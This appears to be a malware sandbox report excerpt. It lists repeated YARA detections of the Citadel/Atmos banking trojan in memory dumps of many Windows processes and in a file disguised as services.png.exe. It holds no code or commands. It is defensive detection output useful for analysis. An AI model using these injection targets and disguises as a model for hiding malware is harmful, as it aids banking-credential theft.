                        Source: 7.3.svchost.exe.d40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 7.3.svchost.exe.d40000.0.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 38.0.XRdxSzSUL8yOL.exe.2f50000.1.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 38.0.XRdxSzSUL8yOL.exe.2f50000.1.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 36.0.XRdxSzSUL8yOL.exe.2ca0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 36.0.XRdxSzSUL8yOL.exe.2ca0000.1.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 34.2.XRdxSzSUL8yOL.exe.2400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 34.2.XRdxSzSUL8yOL.exe.2400000.1.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 18.0.RuntimeBroker.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 18.0.RuntimeBroker.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 18.0.RuntimeBroker.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 9.3.RuntimeBroker.exe.110000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 9.3.RuntimeBroker.exe.110000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 9.3.RuntimeBroker.exe.110000.0.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 17.0.RuntimeBroker.exe.3d0000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 17.0.RuntimeBroker.exe.3d0000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 17.0.RuntimeBroker.exe.3d0000.0.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 9.3.RuntimeBroker.exe.110000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 9.3.RuntimeBroker.exe.110000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 9.3.RuntimeBroker.exe.110000.0.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 34.0.XRdxSzSUL8yOL.exe.2400000.1.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 34.0.XRdxSzSUL8yOL.exe.2400000.1.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 5.3.ctfmon.exe.a50000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 5.3.ctfmon.exe.a50000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 5.3.ctfmon.exe.a50000.0.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 15.3.smartscreen.exe.290000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 15.3.smartscreen.exe.290000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 15.3.smartscreen.exe.290000.0.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 39.0.XRdxSzSUL8yOL.exe.2b30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 39.0.XRdxSzSUL8yOL.exe.2b30000.1.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 28.0.RuntimeBroker.exe.810000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 28.0.RuntimeBroker.exe.810000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 28.0.RuntimeBroker.exe.810000.0.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 25.0.dllhost.exe.ac0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 25.0.dllhost.exe.ac0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 25.0.dllhost.exe.ac0000.0.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 0.2.services.png.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 0.2.services.png.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 0.2.services.png.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 31.0.XRdxSzSUL8yOL.exe.2e30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 31.0.XRdxSzSUL8yOL.exe.2e30000.1.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 25.3.dllhost.exe.ac0000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 25.3.dllhost.exe.ac0000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 25.3.dllhost.exe.ac0000.0.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 17.3.RuntimeBroker.exe.3d0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 17.3.RuntimeBroker.exe.3d0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 17.3.RuntimeBroker.exe.3d0000.0.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 37.2.XRdxSzSUL8yOL.exe.c90000.1.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 37.2.XRdxSzSUL8yOL.exe.c90000.1.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 37.2.XRdxSzSUL8yOL.exe.c90000.1.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 0.3.services.png.exe.2590000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 20.3.WinStore.App.exe.a10000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 20.3.WinStore.App.exe.a10000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 20.3.WinStore.App.exe.a10000.0.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 41.2.XRdxSzSUL8yOL.exe.2c90000.1.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 41.2.XRdxSzSUL8yOL.exe.2c90000.1.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 22.0.SystemSettings.exe.f10000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 22.0.SystemSettings.exe.f10000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 22.0.SystemSettings.exe.f10000.0.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 36.2.XRdxSzSUL8yOL.exe.2ca0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 36.2.XRdxSzSUL8yOL.exe.2ca0000.1.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 0.2.services.png.exe.2810000.1.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 0.2.services.png.exe.2810000.1.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 27.0.backgroundTaskHost.exe.e20000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 27.0.backgroundTaskHost.exe.e20000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 27.0.backgroundTaskHost.exe.e20000.0.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 6.0.explorer.exe.c350000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 6.0.explorer.exe.c350000.0.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 17.0.RuntimeBroker.exe.3d0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 17.0.RuntimeBroker.exe.3d0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 17.0.RuntimeBroker.exe.3d0000.0.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 8.3.StartMenuExperienceHost.exe.b50000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 8.3.StartMenuExperienceHost.exe.b50000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 8.3.StartMenuExperienceHost.exe.b50000.0.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 31.2.XRdxSzSUL8yOL.exe.2e30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 31.2.XRdxSzSUL8yOL.exe.2e30000.1.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 1.3.nyheukpo.exe.20f0000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 35.2.XRdxSzSUL8yOL.exe.25d0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 35.2.XRdxSzSUL8yOL.exe.25d0000.1.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 25.3.dllhost.exe.ac0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 25.3.dllhost.exe.ac0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 25.3.dllhost.exe.ac0000.0.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 16.0.TextInputHost.exe.580000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 16.0.TextInputHost.exe.580000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 16.0.TextInputHost.exe.580000.0.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 10.0.SearchApp.exe.a90000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 10.0.SearchApp.exe.a90000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 10.0.SearchApp.exe.a90000.0.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 37.0.XRdxSzSUL8yOL.exe.c90000.1.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 37.0.XRdxSzSUL8yOL.exe.c90000.1.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 37.0.XRdxSzSUL8yOL.exe.c90000.1.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 18.3.RuntimeBroker.exe.900000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 18.3.RuntimeBroker.exe.900000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 18.3.RuntimeBroker.exe.900000.0.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 21.3.RuntimeBroker.exe.190000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 21.3.RuntimeBroker.exe.190000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 21.3.RuntimeBroker.exe.190000.0.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 0.2.services.png.exe.2810000.1.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 0.2.services.png.exe.2810000.1.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 16.3.TextInputHost.exe.580000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 16.3.TextInputHost.exe.580000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 16.3.TextInputHost.exe.580000.0.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 19.0.ApplicationFrameHost.exe.180000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 19.0.ApplicationFrameHost.exe.180000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 19.0.ApplicationFrameHost.exe.180000.0.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 18.3.RuntimeBroker.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 18.3.RuntimeBroker.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 18.3.RuntimeBroker.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 26.0.conhost.exe.30000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 26.0.conhost.exe.30000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
